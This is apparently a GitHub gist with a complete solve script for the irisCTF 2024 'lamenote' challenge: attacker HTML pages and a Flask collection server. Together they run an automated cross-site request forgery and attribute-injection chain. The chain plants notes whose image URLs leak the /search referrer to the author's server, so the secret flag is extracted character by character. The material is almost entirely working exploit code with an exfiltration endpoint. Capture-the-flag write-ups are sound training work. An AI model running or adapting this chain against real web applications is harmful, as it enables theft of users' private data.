@nyxsorcerer
Created January 9, 2024 19:01
irisCTF 2024 [lamenote]
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<iframe id="stuff" frameborder="0"></iframe>
<script>
// Build a random alphanumeric string of `length` characters.
// Only used below as a throwaway note title, so Math.random (not
// cryptographically secure) is acceptable here; do not reuse for secrets.
function makeid(length) {
  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  const out = [];
  // Same loop bound as a counter-based while: a non-integer length rounds up.
  for (let i = 0; i < length; i += 1) {
    out.push(alphabet.charAt(Math.floor(Math.random() * alphabet.length)));
  }
  return out.join('');
}
// Collection endpoint: the author's Flask app (listed further down) that serves
// the recovered prefix on /known and receives per-candidate reports on /iterate.
let webhook = "https://nyxmare.world/";
// The challenge target; its /create and /search routes are driven from this page.
let remote = "https://lamenote-web.chal.irisc.tf/";
// Round plan (author's notes, reworded): read the known prefix from the webhook,
// plant one note per candidate character via an iframe'd cross-site POST, then
// point each iframe at /search?query=<prefix + candidate> so the planted note's
// image URL reports back.
// Promise-based delay used to pace the rounds.
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
// Fetch the flag prefix recovered so far from the webhook's /known route.
// Resolves to the plain-text response body.
async function check_known() {
  const response = await fetch(`${webhook}known`);
  return response.text();
}
// Runs one round of the character-by-character leak, then reloads the page.
// Per round: read the prefix recovered so far from the webhook, plant one note
// per candidate (prefix + candidate) through a cross-site form POST, then load
// the target's /search for each candidate so the planted note's image URL reports
// back to the webhook. The webhook picks the next character when it sees CHECK.
// Defender note: the chain needs /create to accept a cross-site form POST and the
// image value to land unescaped in an attribute; a CSRF token or SameSite cookie
// on the target, or attribute-escaping the value, breaks it.
async function main (){
  // Candidate alphabet; "}" is the flag terminator (see the endsWith check).
  let charset = "abcdefghijklmnopqrstuvwxyz_}"
  // r: the recovered prefix as served by the webhook's /known route.
  await check_known().then(async function(r){
    // Nothing left to do once the prefix already closes the flag.
    if(r.endsWith("}")){ return 1; }
    // for...in over a string yields index strings; charset[_] is the character.
    for(let _ in charset){
      // NOTE(review): assigned without let/const — an implicit global.
      // data: URL holding a self-submitting POST form to the target's /create.
      // The `image` value closes the attribute early with `&'` and appends
      // referrerpolicy='unsafe-url' — presumably the target writes this value
      // unescaped into an <img> tag, so loading it sends the full referring URL
      // (the /search query, i.e. prefix + candidate) to the webhook; the target's
      // side is not visible here. The \x3e escapes presumably keep the literal
      // </script> from closing this page's own <script> block.
      data_csrf = `data:text/html,
<html\x3e
<body\x3e
<form action="${remote}create" method="POST">
<input type="hidden" name="title" value="${makeid(32)}" />
<input type="hidden" name="text" value="${r+charset[_]}" />
<input type="hidden" name="image" value="${webhook}iterate?c=${r + charset[_]}&' referrerpolicy='unsafe-url" />
<input type="submit" value="Submit request" />
</form\x3e
<script\x3e
document.forms[0].submit();
</script\x3e
</body\x3e
</html\x3e`
      console.log(r + charset[_])
      // One iframe per candidate; the id lets the second loop find it again.
      // "}" is swapped for "_" so the "#nyx_…" selector below stays valid.
      let iframeWrap = document.createElement('iframe')
      iframeWrap.src = data_csrf
      iframeWrap.id = "nyx_"+(charset[_]).replace("}", "_")
      document.body.appendChild(iframeWrap)
    }
    // Give the cross-site POSTs time to land before reusing the iframes.
    await sleep(1*1000)
    for(let _ in charset){
      let iframeWrap = document.body.querySelector("#nyx_"+(charset[_]).replace("}", "_"))
      // No-op: only src was ever set on these iframes, never srcdoc.
      iframeWrap.removeAttribute('srcdoc')
      // Re-point the iframe at the target's search for prefix + candidate.
      iframeWrap.src = remote + `search?query=${r + charset[_]}`
    }
    // Let the search pages (and their image loads) finish, then ask the webhook
    // to pick the next character and start over with the longer prefix.
    await sleep(3*1000)
    await fetch(webhook + `iterate?c=CHECK`)
    location.reload()
  })
}
// Kick off the first round as soon as the script runs.
main()
</script>
</body>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- <iframe id="stuff" src="https://lamenote-web.chal.irisc.tf/search?query=" frameborder="0"></iframe> -->
<script>
// Promise-based delay helper (declared on this page but not used by main()).
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
// Launcher: open /csrf (served by the same Flask app) in a new window.
async function main() {
  window.open('/csrf');
}
main();
</script>
</body>
</html>
from flask import *
from urllib.parse import urlparse
from functools import wraps
import string
# Candidate characters reported by the victim browser since the last CHECK
# (appended by /iterate, cleared by check_not_exists()).
chars = []
# Flag prefix recovered so far; seeded by hand here and extended by one
# character per round.
known = "irisctf{please_no_more_unintended_bug"
app = Flask(__name__)
@app.after_request
def csp(response):
    """Add ``Access-Control-Allow-Origin: *`` to every response.

    Despite the name, no Content-Security-Policy is set here; the header only
    permits cross-origin readers of bodies such as ``/known``.

    Args:
        response: the outgoing Flask response.

    Returns:
        The same response object with the CORS header added.
    """
    cors_header = "Access-Control-Allow-Origin"
    response.headers[cors_header] = "*"
    return response
@app.route("/")
def index():
    """Placeholder root page; returns a fixed string."""
    return "idklol"
@app.route("/start_exp")
def exp():
    """Serve ``index.html`` — presumably the launcher page that window.open()s /csrf."""
    return send_file("index.html")
@app.route("/csrf")
def csrf():
    """Serve ``csrf.html`` — presumably the page that plants notes and drives /search."""
    return send_file("csrf.html")
@app.route("/known")
def known_():
    """Return the flag prefix recovered so far as the response body.

    Polled by the exploit page's check_known() at the start of each round.
    """
    global known  # read-only here; the global statement is not required
    print(known)
    return known
def check_not_exists():
    """Extend ``known`` by one character and reset the per-round report list.

    From the candidate alphabet (a-z, "_", "}") every character the victim
    browser reported this round via /iterate is discarded; the first character
    that was *not* reported is appended to ``known``.

    NOTE(review): "no report for this candidate" is treated as the positive
    signal; why the target stays silent for the matching candidate is not
    visible from this file.

    Raises:
        IndexError: if every candidate was reported this round.
    """
    global chars, known
    remaining = [c for c in string.ascii_lowercase + "_}" if c not in chars]
    print(remaining)
    known += remaining[0]
    print(known)
    chars = []
@app.route("/iterate", methods=["GET", "OPTIONS"])
def home():
    """Collect one report from the victim browser (reached via the planted image URL).

    Query parameter ``c`` carries ``known + candidate``; the known prefix is
    stripped so only the candidate remains. Special values: ``CHECK`` ends the
    round (see check_not_exists()); ``(empty)`` is the default when ``c`` is
    missing and is only logged. Reports whose Referer contains ``/note/`` are
    ignored — presumably loads from a note's own page rather than from /search,
    which is the signal the exploit wants; not verifiable here.

    Returns:
        An empty body in every case.
    """
    candidate = request.args.get("c", "(empty)").replace(known, "")
    referer = request.headers.get("Referer", "")
    print(referer)
    if "/note/" in referer:
        return ""
    if candidate == "CHECK":
        check_not_exists()
        return ""
    if candidate == "(empty)":
        print("SOMETHING WENT WRONG")
        return ""
    print(chars)
    # append() mutates the module-level list in place; no rebinding needed.
    chars.append(candidate)
    return ""
# Bind every interface on port 80 with Flask's built-in development server.
app.run("0.0.0.0", 80)